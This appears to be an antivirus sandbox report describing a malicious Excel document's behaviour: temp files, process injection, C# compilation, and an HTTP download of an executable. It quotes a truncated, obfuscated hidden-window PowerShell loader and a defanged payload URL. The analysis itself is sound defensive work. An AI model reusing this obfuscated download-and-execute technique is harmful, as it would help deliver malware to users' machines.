Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function l82e2 {param($k4a24a)$x4bd58='qcf3fc';$sc2a6='';for ($i=0; $i -lt $k4a24a.length;$i+=2){$n9d21=[convert]::ToByte($k4a24a.Substring($i,2),16);$sc2a6+=[char]($n9d21...
Injects code into
the following user processes:
- qb1471.exe
Modifies file system
Creates the following files
- %TEMP%\ne9ecn71.0.cs
- %TEMP%\csc272c.tmp
- %TEMP%\res273d.tmp
- %TEMP%\zbf6rlxp.dll
- %TEMP%\s8d0hwbd.0.cs
- %TEMP%\s8d0hwbd.cmdline
- %TEMP%\zbf6rlxp.cmdline
- %TEMP%\zbf6rlxp.out
- %TEMP%\s8d0hwbd.out
- %TEMP%\s8d0hwbd.dll
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{4c0d5da3-4f31-4856-9704-755953d3e62c}.tmp
- %APPDATA%\qb1471.exe
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\policy.vpol
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\3ccd5499-87a8-4b10-a215-608888dd3b55.vsch
- %TEMP%\csc34c9.tmp
- %TEMP%\res34d9.tmp
- %TEMP%\zbf6rlxp.0.cs
- %TEMP%\ne9ecn71.dll
- %TEMP%\pf94nnzv.dll
- %TEMP%\ne9ecn71.out
- %TEMP%\pf94nnzv.0.cs
- %TEMP%\pf94nnzv.cmdline
- %TEMP%\pf94nnzv.out
- %TEMP%\yzi8zmqj.0.cs
- %TEMP%\yzi8zmqj.cmdline
- %TEMP%\ne9ecn71.cmdline
- %TEMP%\yzi8zmqj.out
- %TEMP%\csc1ccc.tmp
- %TEMP%\csc1d39.tmp
- %TEMP%\res1c8e.tmp
- %TEMP%\yzi8zmqj.dll
- %TEMP%\res1ccd.tmp
- %TEMP%\res1d4a.tmp
- %TEMP%\csc1c7e.tmp
- %PROGRAMDATA%\microsoft\vault\ac658cb4-9126-49bd-b877-31eedab3f204\2f1a6504-0641-44cf-8bb5-3612d865f2e5.vsch
- %LOCALAPPDATA%\microsoft\vault\4bf4c442-9b8a-41a0-b380-dd4a704ddb28\policy.vpol
Deletes the following files
- %TEMP%\res1c8e.tmp
- %TEMP%\pf94nnzv.out
- %TEMP%\pf94nnzv.dll
- %TEMP%\res273d.tmp
- %TEMP%\csc272c.tmp
- %TEMP%\zbf6rlxp.out
- %TEMP%\zbf6rlxp.cmdline
- %TEMP%\zbf6rlxp.0.cs
- %TEMP%\s8d0hwbd.cmdline
- %TEMP%\zbf6rlxp.dll
- %TEMP%\res34d9.tmp
- %TEMP%\csc34c9.tmp
- %TEMP%\s8d0hwbd.pdb
- %TEMP%\s8d0hwbd.0.cs
- %TEMP%\s8d0hwbd.out
- %TEMP%\pf94nnzv.0.cs
- %TEMP%\zbf6rlxp.pdb
- %TEMP%\pf94nnzv.cmdline
- %TEMP%\yzi8zmqj.out
- %TEMP%\csc1c7e.tmp
- %TEMP%\res1ccd.tmp
- %TEMP%\csc1ccc.tmp
- %TEMP%\res1d4a.tmp
- %TEMP%\csc1d39.tmp
- %TEMP%\yzi8zmqj.dll
- %TEMP%\yzi8zmqj.cmdline
- %TEMP%\ne9ecn71.0.cs
- %TEMP%\yzi8zmqj.pdb
- %TEMP%\yzi8zmqj.0.cs
- %TEMP%\ne9ecn71.dll
- %TEMP%\ne9ecn71.pdb
- %TEMP%\ne9ecn71.out
- %TEMP%\ne9ecn71.cmdline
- %TEMP%\pf94nnzv.pdb
- %TEMP%\s8d0hwbd.dll
Network activity
TCP
HTTP GET requests
- http://10#.#89.10.150/eg/7845100.exe
Miscellaneous
Creates and executes the following
- '%APPDATA%\qb1471.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function l82e2 {param($k4a24a)$x4bd58='qcf3fc';$sc2a6='';for ($i=0; $i -lt $k4a24a.length;$i+=2){$n9d21=[convert]::ToByte($k4a24a.Substring($i,2),16);$sc2a6+=[char]($n9d21...' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ne9ecn71.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pf94nnzv.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yzi8zmqj.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1C8E.tmp" "%TEMP%\CSC1C7E.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1CCD.tmp" "%TEMP%\CSC1CCC.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1D4A.tmp" "%TEMP%\CSC1D39.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zbf6rlxp.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES273D.tmp" "%TEMP%\CSC272C.tmp"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s8d0hwbd.cmdline"' (with hidden window)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES34D9.tmp" "%TEMP%\CSC34C9.tmp"' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\ne9ecn71.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\pf94nnzv.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\yzi8zmqj.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1C8E.tmp" "%TEMP%\CSC1C7E.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1CCD.tmp" "%TEMP%\CSC1CCC.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES1D4A.tmp" "%TEMP%\CSC1D39.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\zbf6rlxp.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES273D.tmp" "%TEMP%\CSC272C.tmp"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\s8d0hwbd.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RES34D9.tmp" "%TEMP%\CSC34C9.tmp"
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
